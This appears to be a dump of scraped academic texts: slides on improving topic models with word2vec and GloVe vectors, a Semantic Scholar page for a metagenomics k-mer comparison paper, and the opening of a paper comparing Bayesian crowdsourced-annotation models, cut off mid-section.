Sci., DOI 10.7717/peerj-cs.417 18/18 https://peerj.com http://dx.doi.org/10.1109/ACCESS.2019.2921621 http://dx.doi.org/10.7717/peerj-cs.417 work_4edup4wwozbhdb2gbpd24ungsu ---- Improving Topic Models with Latent Feature Word Representations Improving Topic Models with Latent Feature Word Representations Mark Johnson Joint work with Dat Quoc Nguyen, Richard Billingsley and Lan Du Dept of Computing Macquarie University Sydney Australia July 2015 1 / 29 Outline Introduction Latent-feature topic models Experimental evaluation Conclusions and future work 2 / 29 High-level overview • Topic models take a corpus of documents as input, and jointly cluster: É words by the documents that they occur in, and É documents by the words that they contain • If the corpus is small and/or the documents are short, these clusters will be noisy • Latent feature representations of words learnt from large external corpora (e.g., word2vec, Glove) capture various aspects of word meanings • Here we use latent feature representations learnt on a large external corpus to improve the topic-word distributions in a topic model É we combine the Dirichlet-Multinomial models of Latent Dirichlet Allocation (LDA) with the distributed representations used in neural networks É the improvement is greatest on small corpora with short documents, e.g., Twitter data 3 / 29 Related work • Phan et al. (2011) assumed that the small corpus is a sample of topics from a larger corpus like Wikipedia, and use the topics discovered in the larger corpus to help shape the topic representations in the small corpus É if the larger corpus has many irrelevant topics, this will “use up” the topic space of the model • Petterson et al. (2010) proposed an extension of LDA that uses external information about word similarity, such as thesauri and dictionaries, to smooth the topic-to-word distribution • Sahami and Heilman (2006) employed web search results to improve the information in short texts • Neural network topic models of a single corpus have also been proposed (Salakhutdinov and Hinton, 2009; Srivastava et al., 2013; Cao et al., 2015). 4 / 29 Latent Dirichlet Allocation (LDA) θd ∼ Dir(α) zdi ∼ Cat(θd ) φz ∼ Dir(β) wdi ∼ Cat(φzdi ) • Latent Dirichlet Allocation (LDA) is an admixture model, i.e., each document d is associated with a distribution over topics θd • Inference is typically performed with a Gibbs sampler over the zd,i, integrating out θ and φ (Griffiths et al., 2004) P(zdi =t | Z¬di ) ∝ (N t d¬i + α) N t,wdi ¬di + β Nt¬di + V β 5 / 29 The Dirichlet Multinomial Mixture (DMM) model θ ∼ Dir(α) zd ∼ Cat(θ) φz ∼ Dir(β) wdi ∼ Cat(φzd ) • The Dirichlet Multinomial Mixture (DMM) model is a mixture model, i.e., each document d is associated with a single topic zd (Nigam et al., 2000) • Inference can also be performed using a collapsed Gibbs sampler in which θ and φz are integrated out (Yin and Wang, 2014) P(zd = t | Z¬d ) ∝ (M t ¬d + α) Γ(Nt¬d + V β) Γ(Nt¬d + Nd + V β) ∏ w∈W Γ(Nt,w¬d + N w d + β) Γ(Nt,w¬d + β) 6 / 29 Latent feature word representations • Traditional count-based methods (Deerwester et al., 1990; Lund and Burgess, 1996; Bullinaria and Levy, 2007) for learning real-valued latent feature (LF) vectors rely on co-occurrence counts • Recent approaches based on deep neural networks learn vectors by predicting words given their window-based context (Collobert and Weston, 2008; Mikolov et al., 2013; Pennington et al., 2014; Liu et al., 2015) • We downloaded the pre-trained vectors for word2vec and Glove for this paper 7 / 29 Outline Introduction Latent-feature topic models Experimental evaluation Conclusions and future work 8 / 29 Latent-feature topic-to-word distributions • We assume that each word w is associated with a word vector ωw • We learn a topic vector τt for each topic t • We use these to define a distribution CatE(w) over words: CatE(w | τtω>) ∝ exp(τt ·ωw ) É τtω > is a vector of unnormalised scores, one per word • In our topic models, we mix the CatE distribution with a multinomial distribution over words, so we can capture ideosyncratic properties of the corpus (e.g., words not seen in the external corpus) É we use a Boolean indicator variable that records whether a word is generated from CatE or the multinomial distribution 9 / 29 The Latent Feature LDA model θd ∼ Dir(α) zdi ∼ Cat(θd ) φz ∼ Dir(β) sdi ∼ Ber(λ) wdi ∼ (1− sdi )Cat(φzdi ) + sdi CatE(τzdi ω >) • sdi is the Boolean indicator variable indicating whether word di is generated from CatE • λ is a user-specified hyper-parameter determining how often words are generated from the CatE distribution É if we estimated λ from data, we expect it would never generate through CatE 10 / 29 The Latent Feature DMM model θd ∼ Dir(α) zdi ∼ Cat(θd ) φz ∼ Dir(β) sdi ∼ Ber(λ) wdi ∼ (1− sdi )Cat(φzdi ) + sdi CatE(τzdi ω >) • sdi is the Boolean indicator variable indicating whether word di is generated from CatE • λ is a user-specified hyper-parameter determining how often words are generated from the CatE distribution 11 / 29 Inference for the LF-LDA model • We integrate out θ and φ as in the Griffiths et al. (2004) sampler, and interleave MAP estimation for τ with Gibbs sweeps for the other variables • Algorithm outline: initialise the word-topic variables zdi using the LDA sampler repeat: for each topic t: τt = arg maxτt P(τt | z,s) for each document d and each word location i: sample zdi from P(zdi | z¬di ,s¬di ,τ) sample sdi from P(sdi | z,s¬di ,τ) 12 / 29 Inference for the LF-DMM model (1) • We integrate out θ and φ as in the Yin and Wang (2014) sampler, and interleave MAP estimation for τ with Gibbs sweeps • Algorithm outline: initialise the word-topic variables zdi using the DMM sampler repeat: for each topic t: τt = arg maxτt P(τt | z,s) for each document d: sample zd from P(zd | z¬d,s¬di ,τ) for each word location i: sample sdi from P(sdi | z,s¬di ,τ) • Note: P(zd | z¬d,s¬di ,τ) is computationally expensive to compute exactly, as it requires summing over all possible values for sd 13 / 29 Inference for the LF-DMM model (2) • The computational problems stem from the fact that all the words in a document have the same topic É have to jointly sample document topic zt and indicator variables sd É the sampling probability is a product of ascending factorials • We approximate these probabilities by assuming that the topic-word counts are “frozen”, i.e., they don’t increase within a document É the DMM is mainly used on short documents (e.g., Twitter), where the “one topic per document” assumption is accurate ⇒ “freezing” the counts should have less impact É could correct this with a Metropolis-Hastings accept-reject step P(zd,sd | z¬d,s¬d,τ) ∝ λ Kd (1 −λ)Nd (Mt¬d + α) Γ(Nt¬d + V β) Γ(Nt¬d + Nd + V β) � ∏ w∈W Γ(Nt,w¬d + N w d + β) Γ(Nt,w¬d + β) �� ∏ w∈W CatE(w | τt ω>)K w d � 14 / 29 Estimating the topic vectors τt • Both the LF-LDA and LF-DMM associate each topic t with a topic vector τt, which must be learnt from the training corpus • After each Gibbs sweep: É the topic variables z identify which topic each word is generated from É the indicator variables s identify which words are generated from the latent feature distributions CatE ⇒ we can use a supervised estimation procedure to find τ • We use LBFGS to optimise the L2-regularised log-loss (MAP estimation) Lt = − ∑ w∈W K t,w � τt ·ωw − log( ∑ w ′∈W exp(τt ·ωw ′)) � + µ ‖ τt ‖22 15 / 29 Outline Introduction Latent-feature topic models Experimental evaluation Conclusions and future work 16 / 29 Goals of evaluation • A topic model learns document-topic and topic-word distributions: É topic coherence evaluates the topic-word distributions É document clustering and document classification evaluate the document-topic distribution – the latent feature component only directly changes the topic-word distributions, so these are challenging evaluations • Do the word2vec and Glove word vectors behave differently in topic modelling? • We expect that the latent feature component will have the greatest impact on small corpora, so our evaluation focuses on them: Dataset # labels # docs words/doc # types N20 20 newsgroups 20 18,820 103.3 19,572 N20short ≤ 20 words 20 1,794 13.6 6,377 N20small 400 docs 20 400 88.0 8,157 TMN TagMyNews 7 32,597 18.3 13,428 TMNtitle TMN titles 7 32,503 4.9 6,347 Twitter 4 2,520 5.0 1,390 17 / 29 Word2vec-DMM on TagMyNews titles corpus (1) Topic 1 Initdmm Iter=1 Iter=2 Iter=5 Iter=10 Iter=20 Iter=50 Iter=100 Iter=500 japan japan japan japan japan japan japan japan japan nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear nuclear u.s. u.s. u.s. u.s. u.s. u.s. plant u.s. u.s. crisis russia crisis plant plant plant u.s. plant plant plant radiation china crisis radiation quake quake quake quake china nuke russia radiation crisis radiation radiation radiation radiation libya iran plant china china crisis earthquake earthquake earthquake radiation crisis radiation russia nuke nuke tsunami tsunami tsunami u.n. china nuke nuke russia china nuke nuke nuke vote libya libya power power tsunami crisis crisis crisis korea plant iran u.n. u.n. earthquake disaster disaster disaster europe u.n. u.n. iran iran disaster plants oil power government mideast power reactor earthquake power power plants oil election pakistan pakistan earthquake reactor reactor oil power japanese deal talks talks libya quake japanese japanese tepco plants • Table shows the 15 most probable topical words in Topic 1 found by 20-topic word2vec-DMM on the TMN titles corpus • Words found by DMM but not by word2vec-DMM are underlined • Words found by word2vec-DMM but not DMM are in bold 18 / 29 Word2Vec-DMM on TagMyNews titles corpus (2) Topic 4 Topic 5 Topic 19 Topic 14 Initdmm Iter=50 Iter=500 Initdmm Iter=50 Iter=500 Initdmm Iter=50 Iter=500 Initdmm Iter=50 Iter=500 egypt libya libya critic dies star nfl nfl nfl nfl law law china egypt egypt corner star sheen idol draft sports court bill texas u.s. mideast iran office broadway idol draft lockout draft law governor bill mubarak iran mideast video american broadway american players players bill texas governor bin opposition opposition game idol show show coach lockout wisconsin senate senate libya leader protests star lady american film nba football players union union laden u.n. leader lady gaga gaga season player league judge obama obama france protests syria gaga show tour sheen sheen n.f.l. governor wisconsin budget bahrain syria u.n. show news cbs n.f.l. league player union budget wisconsin air tunisia tunisia weekend critic hollywood back n.f.l. baseball house state immigration report protesters chief sheen film mtv top coaches court texas immigration state rights chief protesters box hollywood lady star football coaches lockout arizona vote court asia mubarak park fame wins charlie judge nflpa budget california washington u.n. russia crackdown takes actor charlie players nflpa basketball peru vote arizona war arab bahrain man movie stars men court game senate federal california • Table shows 15 most probable topical words in several topics found by 20-topic word2vec-DMM on the TMN titles corpus • Words found by DMM but not by w2v-DMM are underlined • Words found by w2v-DMM but not DMM are in bold 19 / 29 Topic coherence evaluation • Lau et al. (2014) showed that human scores on a word intrusion task are highly correlated with the normalised pointwise mutual information (NPMI) against a large external corpus (we used English Wikipedia) • We found latent feature vectors produced a significant improvement of NPMI scores on all models and corpora É greatest improvement when λ = 1 (unsurprisingly) NPMI scores on the N20 short dataset with 20 topics, as the mixture weight λ varies from 0 to 1 20 / 29 Topic coherence on Twitter corpus Data Method λ = 1.0 T=4 T=20 T=40 T=80 lda -8.5 ± 1.1 -14.5 ± 0.4 -15.1 ± 0.4 -15.9 ± 0.2 Twitter w2v-lda -7.3 ± 1.0 -13.2 ± 0.6 -14.0 ± 0.3 -14.1 ± 0.3 glove-lda -6.2 ± 1.6 -13.9 ± 0.6 -14.2 ± 0.4 -14.2 ± 0.2 Improve. 2.3 1.3 1.1 1.8 dmm -5.9 ± 1.1 -10.4 ± 0.7 -12.0 ± 0.3 -13.3 ± 0.3 Twitter w2v-dmm -5.5 ± 0.7 -10.5 ± 0.5 -11.2 ± 0.5 -12.5 ± 0.1 glove-dmm -5.1 ± 1.2 -9.9 ± 0.6 -11.1 ± 0.3 -12.5 ± 0.4 Improve. 0.8 0.5 0.9 0.8 • The normalised pointwise mutual information score improves for both LDA and DMM on the Twitter corpus, across a wide range of number of topics 21 / 29 Document clustering evaluation • Cluster documents by assigning them to the highest probability topic • Evaluate clusterings by purity and normalised mutual information (NMI) (Manning et al., 2008) Evaluation of 20-topic LDA on the N20 short corpus, as mixture weight λ varies from 0 to 1 • In general, best results with λ = 0.6 ⇒ Set λ = 0.6 in all further experiments 22 / 29 Document clustering of Twitter data Data Method Purity NMI T=4 T=20 T=40 T=80 T=4 T=20 T=40 T=80 lda 0.559 ± 0.020 0.614 ± 0.016 0.626 ± 0.011 0.631 ± 0.008 0.196 ± 0.018 0.174 ± 0.008 0.170 ± 0.007 0.160 ± 0.004 Twitter w2v-lda 0.598 ± 0.023 0.635 ± 0.016 0.638 ± 0.009 0.637 ± 0.012 0.249 ± 0.021 0.191 ± 0.011 0.176 ± 0.003 0.167 ± 0.006 glove-lda 0.597 ± 0.016 0.635 ± 0.014 0.637 ± 0.010 0.637 ± 0.007 0.242 ± 0.013 0.191 ± 0.007 0.177 ± 0.007 0.165 ± 0.005 Improve. 0.039 0.021 0.012 0.006 0.053 0.017 0.007 0.007 dmm 0.552 ± 0.020 0.624 ± 0.010 0.647 ± 0.009 0.675 ± 0.009 0.194 ± 0.017 0.186 ± 0.006 0.184 ± 0.005 0.190 ± 0.003 Twitter w2v-dmm 0.581 ± 0.019 0.641 ± 0.013 0.660 ± 0.010 0.687 ± 0.007 0.230 ± 0.015 0.195 ± 0.007 0.193 ± 0.004 0.199 ± 0.005 glove-dmm 0.580 ± 0.013 0.644 ± 0.016 0.657 ± 0.008 0.684 ± 0.006 0.232 ± 0.010 0.201 ± 0.010 0.191 ± 0.006 0.195 ± 0.005 Improve. 0.029 0.02 0.013 0.012 0.038 0.015 0.009 0.009 • On the short, small Twitter dataset our models obtain better clustering results than the baseline models with small T. É with T = 4 we obtain 3.9% purity and 5.3% NMI improvements • For small T ≤ 7, on the large datasets of N20, TMN and TMNtitle, our models and baseline models obtain similar clustering results. • With larger T our models perform better than baselines on the short TMN and TMNtitle datasets • On the N20 dataset, the baseline LDA model obtains better clustering results than ours • No reliable difference between word2vec and Glove vectors 23 / 29 Document classification of N20 and N20short corpora • Train a SVM to predict document label based on topic(s) assigned to document Data Model λ = 0.6 T=6 T=20 T=40 T=80 lda 0.312 ± 0.013 0.635 ± 0.016 0.742 ± 0.014 0.763 ± 0.005 N20 w2v-lda 0.316 ± 0.013 0.641 ± 0.019 0.730 ± 0.017 0.768 ± 0.004 glove-lda 0.288 ± 0.013 0.650 ± 0.024 0.733 ± 0.011 0.762 ± 0.006 Improve. 0.004 0.015 -0.009 0.005 lda 0.204 ± 0.020 0.392 ± 0.029 0.459 ± 0.030 0.477 ± 0.025 N20small w2v-lda 0.213 ± 0.018 0.442 ± 0.025 0.502 ± 0.031 0.509 ± 0.022 glove-lda 0.181 ± 0.011 0.420 ± 0.025 0.474 ± 0.029 0.498 ± 0.012 Improve. 0.009 0.05 0.043 0.032 • F1 scores (mean and standard deviation) for N20 and N20small corpora 24 / 29 Document classification of TMN and TMN title corpora Data Model λ = 0.6 T=7 T=20 T=40 T=80 lda 0.658 ± 0.026 0.754 ± 0.009 0.768 ± 0.004 0.778 ± 0.004 TMN w2v-lda 0.663 ± 0.021 0.758 ± 0.009 0.769 ± 0.005 0.780 ± 0.004 glove-lda 0.664 ± 0.025 0.760 ± 0.006 0.767 ± 0.003 0.779 ± 0.004 Improve. 0.006 0.006 0.001 0.002 dmm 0.605 ± 0.023 0.724 ± 0.016 0.738 ± 0.008 0.741 ± 0.005 TMN w2v-dmm 0.619 ± 0.033 0.744 ± 0.009 0.759 ± 0.005 0.777 ± 0.005 glove-dmm 0.624 ± 0.025 0.757 ± 0.009 0.761 ± 0.005 0.774 ± 0.010 Improve. 0.019 0.033 0.023 0.036 lda 0.564 ± 0.015 0.625 ± 0.011 0.626 ± 0.010 0.624 ± 0.006 TMNtitle w2v-lda 0.563 ± 0.029 0.644 ± 0.010 0.643 ± 0.007 0.640 ± 0.004 glove-lda 0.568 ± 0.028 0.644 ± 0.010 0.632 ± 0.008 0.642 ± 0.005 Improve. 0.004 0.019 0.017 0.018 dmm 0.570 ± 0.022 0.650 ± 0.011 0.654 ± 0.008 0.646 ± 0.008 TMNtitle w2v-dmm 0.562 ± 0.022 0.670 ± 0.012 0.677 ± 0.006 0.680 ± 0.003 glove-dmm 0.592 ± 0.017 0.674 ± 0.016 0.683 ± 0.006 0.679 ± 0.009 Improve. 0.022 0.024 0.029 0.034 25 / 29 Document classification of Twitter corpus Data Method λ = 0.6 T=4 T=20 T=40 T=80 lda 0.526 ± 0.021 0.636 ± 0.011 0.650 ± 0.014 0.653 ± 0.008 Twitter w2v-lda 0.578 ± 0.047 0.651 ± 0.015 0.661 ± 0.011 0.664 ± 0.010 glove-lda 0.569 ± 0.037 0.656 ± 0.011 0.662 ± 0.008 0.662 ± 0.006 Improve. 0.052 0.02 0.012 0.011 dmm 0.505 ± 0.023 0.614 ± 0.012 0.634 ± 0.013 0.656 ± 0.011 Twitter w2v-dmm 0.541 ± 0.035 0.636 ± 0.015 0.648 ± 0.011 0.670 ± 0.010 glove-dmm 0.539 ± 0.024 0.638 ± 0.017 0.645 ± 0.012 0.666 ± 0.009 Improve. 0.036 0.024 0.014 0.014 • For document classification the latent feature models generally perform better than the baseline models É On the small N20small and Twitter datasets, when the number of topics T is equal to number of ground truth labels (i.e. 20 and 4 correspondingly) our W2V-LDA model obtains 5+% higher F1 score than the LDA model É Our W2V-DMM model achieves 3.6% and 3.4% higher F1 score than the DMM model on the TMN and TMNtitle datasets with T = 80, respectively. 26 / 29 Outline Introduction Latent-feature topic models Experimental evaluation Conclusions and future work 27 / 29 Conclusions • Latent feature vectors induced from large external corpora can be used to improve topic modelling É latent features significantly improve topic coherence across a range of corpora with both the LDA and DMM models É document clustering and document classification also significantly improve, even though these depend directly only on the document-topic distribution • The improvements were greatest for small document collections and/or for short documents É with enough training data there is sufficient information in the corpus to accurately estimate topic-word distributions É the improvement in the topic-word distributions also improves the document-topic distribution • We did not detect any reliable difference between word2vec and Glove vectors 28 / 29 Future directions • Retrain the word vectors to fit the training corpus É how do we avoid losing information from external corpus? • More sophisticated latent-feature models of topic-word distributions • More efficient training procedures (e.g., using SGD) • Extend this approach to a richer class of topic models 29 / 29 Introduction Latent-feature topic models Experimental evaluation Conclusions and future work work_4frqouxcbjey3jnykpwfln2tba ---- [PDF] Multiple comparative metagenomics using multiset k-mer counting | Semantic Scholar Skip to search formSkip to main content> Semantic Scholar's Logo Search Sign InCreate Free Account You are currently offline. Some features of the site may not work correctly. DOI:10.7717/peerj-cs.94 Corpus ID: 7987311Multiple comparative metagenomics using multiset k-mer counting @article{Benoit2016MultipleCM, title={Multiple comparative metagenomics using multiset k-mer counting}, author={G. Benoit and P. Peterlongo and M. Mariadassou and Erwan Drezen and Sophie Schbath and D. Lavenier and C. Lemaitre}, journal={PeerJ Comput. Sci.}, year={2016}, volume={2}, pages={e94} } G. Benoit, P. Peterlongo, +4 authors C. Lemaitre Published 2016 Computer Science, Biology PeerJ Comput. Sci. Background Large scale metagenomic projects aim to extract biodiversity knowledge between different environmental conditions. Current methods for comparing microbial communities face important limitations. Those based on taxonomical or functional assignation rely on a small subset of the sequences that can be associated to known organisms. On the other hand, de novo methods, that compare the whole sets of sequences, either do not scale up on ambitious metagenomic projects or do not provide… Expand View PDF on arXiv Save to Library Create Alert Cite Launch Research Feed Share This Paper 59 CitationsHighly Influential Citations 4 Background Citations 8 Methods Citations 22 Results Citations 1 View All Supplemental Presentations Presentation Slides Multiple comparative metagenomics using multiset k-mer counting Explore Further Discover more papers related to the topics discussed in this paper Figures, Tables, and Topics from this paper table 1 figure 1 figure 2 table 2 figure 3 figure 4 figure 5 figure 6 figure 7 figure 8 View All 10 Figures & Tables Metagenomics Mer K-mer De novo transcriptome assembly Taxonomy (general) Ab initio quantum chemistry methods 59 Citations Citation Type Citation Type All Types Cites Results Cites Methods Cites Background Has PDF Publication Type Author More Filters More Filters Filters Sort by Relevance Sort by Most Influenced Papers Sort by Citation Count Sort by Recency Libra: scalable k-mer–based tool for massive all-vs-all metagenome comparisons Illyoung Choi, Alise J Ponsero, M. Bomhoff, K. Youens-Clark, J. Hartman, B. Hurwitz Computer Science, Medicine GigaScience 2019 16 Highly Influenced PDF View 6 excerpts, cites background, methods and results Save Alert Research Feed SimkaMin: fast and resource frugal de novo comparative metagenomics Gaetan Benoit, M. Mariadassou, S. Robin, S. Schbath, P. Peterlongo, C. Lemaitre Computer Science, Medicine Bioinform. 2020 PDF Save Alert Research Feed Identifying Group-Specific Sequences for Microbial Communities Using Long k-mer Sequence Signatures Y. Wang, Lei Fu, Jie Ren, Z. Yu, Ting Chen, F. Sun Biology, Medicine Front. Microbiol. 2018 5 View 1 excerpt, cites methods Save Alert Research Feed A New Alignment-Free Whole Metagenome Comparison Tool and Its Application on Gut Microbiomes of Wild Giant Pandas Jiuhong Dong, S. Liu, Yaran Zhang, Y. Dai, Qi Wu Biology, Medicine Frontiers in Microbiology 2020 1 View 2 excerpts, cites methods Save Alert Research Feed Recentrifuge: Robust comparative analysis and contamination removal for metagenomics Jose Manuel Martí Computer Science, Medicine PLoS Comput. Biol. 2019 17 PDF Save Alert Research Feed Comparison of microbiome samples: methods and computational challenges M. Comin, B. Camillo, Cinzia Pizzi, Fabio Vandin Computer Science, Medicine Briefings Bioinform. 2021 1 Save Alert Research Feed Recentrifuge: robust comparative analysis and contamination removal for metagenomic data Jose Manuel Martí Biology 2018 3 View 1 excerpt, cites methods Save Alert Research Feed Fast Approximation of Frequent k-Mers and Applications to Metagenomics. Leonardo Pellegrina, Cinzia Pizzi, Fabio Vandin Computer Science, Medicine Journal of computational biology : a journal of computational molecular cell biology 2019 2 Save Alert Research Feed ARDEP, a Rapid Degenerate Primer Design Pipeline Based on k-mers for Amplicon Microbiome Studies Yueni Wu, K. Feng, Ziyan Wei, Zhujun Wang, Y. Deng Biology, Medicine International journal of environmental research and public health 2020 PDF View 1 excerpt, cites methods Save Alert Research Feed APPLES: Scalable Distance-based Phylogenetic Placement with or without Alignments M. Balaban, Shahab Sarmashghi, Siavash Mirarab Computer Science 2019 PDF Save Alert Research Feed ... 1 2 3 4 5 ... References SHOWING 1-10 OF 55 REFERENCES SORT BYRelevance Most Influenced Papers Recency Commet: Comparing and combining multiple metagenomic datasets N. Maillet, G. Collet, Thomas Vannier, D. Lavenier, P. Peterlongo Computer Science, Biology 2014 IEEE International Conference on Bioinformatics and Biomedicine (BIBM) 2014 41 PDF View 10 excerpts, references methods and background Save Alert Research Feed MetaFast: fast reference-free graph-based comparison of shotgun metagenomic data V. Ulyantsev, S. Kazakov, V. Dubinkina, A. Tyakht, D. Alexeev Computer Science, Medicine Bioinform. 2016 25 PDF View 2 excerpts, references methods Save Alert Research Feed Assessment of k-mer spectrum applicability for metagenomic dissimilarity analysis V. Dubinkina, D. Ischenko, V. Ulyantsev, A. Tyakht, D. Alexeev Biology, Computer Science BMC Bioinformatics 2015 47 Highly Influential View 2 excerpts, references methods and background Save Alert Research Feed Compareads: comparing huge metagenomic experiments N. Maillet, C. Lemaitre, R. Chikhi, D. Lavenier, P. Peterlongo Medicine, Biology BMC Bioinformatics 2012 48 View 1 excerpt, references methods Save Alert Research Feed A Novel Abundance-Based Algorithm for Binning Metagenomic Sequences Using l-tuples Yu-Wei Wu, Y. Ye Biology, Medicine J. Comput. Biol. 2011 158 PDF View 1 excerpt, references background Save Alert Research Feed Spaced seeds improve k-mer-based metagenomic classification K. Brinda, Maciej Sykulski, G. Kucherov Biology, Computer Science Bioinform. 2015 63 PDF Save Alert Research Feed Exploration and retrieval of whole-metagenome sequencing samples S. Seth, Niko Välimäki, Samuel Kaski, Antti Honkela Biology, Medicine Bioinform. 2014 26 PDF View 1 excerpt, references background Save Alert Research Feed Exploration and retrieval of whole-metagenome sequencing S. Seth, Samuel Kaski, Antti Honkela Biology 2014 3 Save Alert Research Feed Identification and assembly of genomes and genetic elements in complex metagenomic samples without using reference genomes H. Nielsen, Mathieu Almeida, +49 authors S. Ehrlich Biology, Medicine Nature Biotechnology 2014 599 PDF View 1 excerpt, references background Save Alert Research Feed A Guide to Enterotypes across the Human Body: Meta-Analysis of Microbial Community Structures in Human Microbiome Datasets O. Koren, D. Knights, +5 authors R. Ley Biology, Computer Science PLoS Comput. Biol. 2013 379 PDF Save Alert Research Feed ... 1 2 3 4 5 ... Related Papers Abstract Supplemental Presentations Figures, Tables, and Topics 59 Citations 55 References Related Papers Stay Connected With Semantic Scholar Sign Up About Semantic Scholar Semantic Scholar is a free, AI-powered research tool for scientific literature, based at the Allen Institute for AI. Learn More → Resources DatasetsSupp.aiAPIOpen Corpus Organization About UsResearchPublishing PartnersData Partners FAQContact Proudly built by AI2 with the help of our Collaborators Terms of Service•Privacy Policy The Allen Institute for AI By clicking accept or continuing to use the site, you agree to the terms outlined in our Privacy Policy, Terms of Service, and Dataset License ACCEPT & CONTINUE work_4g77lat4ofeppkced2gc7b6pjq ---- Comparing Bayesian Models of Annotation Silviu Paun1 Bob Carpenter2 Jon Chamberlain3 Dirk Hovy4 Udo Kruschwitz3 Massimo Poesio1 1School of Electronic Engineering and Computer Science, Queen Mary University of London 2Department of Statistics, Columbia University 3School of Computer Science and Electronic Engineering, University of Essex 4Department of Marketing, Bocconi University Abstract The analysis of crowdsourced annotations in natural language processing is con- cerned with identifying (1) gold standard labels, (2) annotator accuracies and biases, and (3) item difficulties and error patterns. Traditionally, majority voting was used for 1, and coefficients of agreement for 2 and 3. Lately, model-based analysis of corpus annotations have proven better at all three tasks. But there has been relatively little work comparing them on the same datasets. This paper aims to fill this gap by ana- lyzing six models of annotation, covering different approaches to annotator ability, item difficulty, and parameter pooling (tying) across annotators and items. We evaluate these models along four aspects: comparison to gold labels, predictive accu- racy for new annotations, annotator char- acterization, and item difficulty, using four datasets with varying degrees of noise in the form of random (spammy) annotators. We conclude with guidelines for model selec- tion, application, and implementation. 1 Introduction The standard methodology for analyzing crowd- sourced data in NLP is based on majority vot- ing (selecting the label chosen by the majority of coders) and inter-annotator coefficients of agree- ment, such as Cohen’s κ (Artstein and Poesio, 2008). However, aggregation by majority vote implicitly assumes equal expertise among the annotators. This assumption, though, has been re- peatedly shown to be false in annotation prac- tice (Poesio and Artstein, 2005; Passonneau and Carpenter, 2014; Plank et al., 2014b). Chance- adjusted coefficients of agreement also have many shortcomings—for example, agreements in mis- take, overly large chance-agreement in datasets with skewed classes, or no annotator bias correc- tion (Feinstein and Cicchetti, 1990; Passonneau and Carpenter, 2014). Research suggests that models of annotation can solve these problems of standard practices when applied to crowdsourcing (Dawid and Skene, 1979; Smyth et al., 1995; Raykar et al., 2010; Hovy et al., 2013; Passonneau and Carpenter, 2014). Such probabilistic approaches allow us to characterize the accuracy of the annotators and correct for their bias, as well as account- ing for item-level effects. They have been shown to perform better than non-probabilistic alterna- tives based on heuristic analysis or adjudication (Quoc Viet Hung et al., 2013). But even though a large number of such models has been proposed (Carpenter, 2008; Whitehill et al., 2009; Raykar et al., 2010; Hovy et al., 2013; Simpson et al., 2013; Passonneau and Carpenter, 2014; Felt et al., 2015a; Kamar et al., 2015; Moreno et al., 2015, in- ter alia), it is not immediately obvious to potential users how these models differ or, in fact, how they should be applied at all. To our knowledge, the literature comparing models of annotation is lim- ited, focused exclusively on synthetic data (Quoc Viet Hung et al., 2013) or using publicly available implementations that constrain the experiments al- most exclusively to binary annotations (Sheshadri and Lease, 2013). Contributions • Our selection of six widely used models (Dawid and Skene, 1979; Carpenter, 2008; Hovy et al., 2013) covers models with vary- ing degrees of complexity: pooled models, which assume all annotators share the same ability; unpooled models, which model in- dividual annotator parameters; and partially pooled models, which use a hierarchical structure to let the level of pooling be dictated by the data. • We carry out the evaluation on four datasets with varying degrees of sparsity and annotator 571 Transactions of the Association for Computational Linguistics, vol. 6, pp. 571–585, 2018. Action Editor: J Boyd-Graber. Submission batch: 3/2018; Revision batch: 6/2018; Published 12/2018. c© 2018 Association for Computational Linguistics. Distributed under a CC-BY 4.0 license. ordan Figure 1: Plate diagram for multinomial model. The hyperparameters are left out. accuracy in both gold-standard dependent and independent settings. • We use fully Bayesian posterior inference to quantify the uncertainty in parameter esti- mates. • We provide guidelines for both model selec- tion and implementation. Our findings indicate that models which in- clude annotator structure generally outperform other models, though unpooled models can over- fit. Several open-source implementations of each model type are available to users. 2 Bayesian Annotation Models All Bayesian models of annotation that we de- scribe are generative: They provide a mechanism to generate parameters θ characterizing the pro- cess (annotator accuracies and biases, prevalence, etc.) from the prior p(θ), then generate the ob- served labels y from the parameters according to the sampling distribution p(y|θ). Bayesian infer- ence allows us to condition on some observed data y to draw inferences about the parameters θ; this is done through the posterior, p(θ|y). The uncertainty in such inferences may then be used in applications such as jointly training clas- sifiers (Smyth et al., 1995; Raykar et al., 2010), comparing crowdsourcing systems (Lease and Kazai, 2011), or characterizing corpus accuracy (Passonneau and Carpenter, 2014). This section describes the six models we eval- uate. These models are drawn from the litera- ture, but some had to be generalized from binary to multiclass annotations. The generalization nat- urally comes with parameterization changes, al- though these do not alter the fundamentals of the models. (One aspect tied to the model parameter- ization is the choice of priors. The guideline we followed was to avoid injecting any class prefer- ences a priori and let the data uncover this infor- mation; see more in §3.) Figure 2: Plate diagram of the Dawid and Skene model. 2.1 A Pooled Model Multinomial (MULTINOM) The simplest Bayesian model of annotation is the binomial model pro- posed in Albert and Dodd (2004) and discussed in Carpenter (2008). This model pools all annota- tors (i.e., assumes they have the same ability; see Figure 1).1 The generative process is: • For every class k ∈{1, 2, ...,K}: – Draw class-level abilities ζk ∼ Dirichlet(1K )2 • Draw class prevalence π ∼ Dirichlet(1K ) • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Categorical(π) – For every position n ∈{1, 2, ...,Ni}: ∗ Draw annotation yi,n ∼ Categorical(ζci) 2.2 Unpooled Models Dawid and Skene (D&S) The model proposed by Dawid and Skene (1979) is, to our knowledge, the first model-based approach to annotation proposed in the literature.3 It has found wide application (e.g., Kim and Ghahramani, 2012; Simpson et al., 2013; Passonneau and Carpenter, 2014). It is an unpooled model, namely, each annotator has their own response parameters (see Figure 2), which are given fixed priors. Its generative process is: • For every annotator j ∈{1, 2, ...,J}: – For every class k ∈{1, 2, ...,K}: ∗ Draw class annotator abilities βj,k ∼ Dirichlet(1K ) 1Carpenter (2008) parameterizes ability in terms of specificity and sensitivity. For multiclass annotations, we generalize to a full response matrix (Passonneau and Carpenter, 2014). 2Notation: 1K is a K-dimensional vector of 1 values. 3Dawid and Skene fit maximum likelihood estimates us- ing expectation maximization (EM), but the model is easily extended to include fixed prior information for regularization, or hierarchical priors for fitting the prior jointly with the abil- ity parameters and automatically performing partial pooling. 572 Figure 3: Plate diagram for the MACE model. • Draw class prevalence π ∼ Dirichlet(1K ) • For every item i ∈{1, 2, ...,I}: – Draw true class ci ∼ Categorical(π) – For every position n ∈{1, 2, ...,Ni}: ∗ Draw annotation yi,n ∼ Categorical(βjj[i,n],ci) 4 Multi-Annotator Competence Estimation (MACE) This model, introduced by Hovy et al. (2013), takes into account the credibility of the annotators and their spamming preference and strategy5 (see Figure 3). This is another example of an unpooled model, and possibly the model most widely applied to linguistic data (e.g., Plank et al., 2014a; Sabou 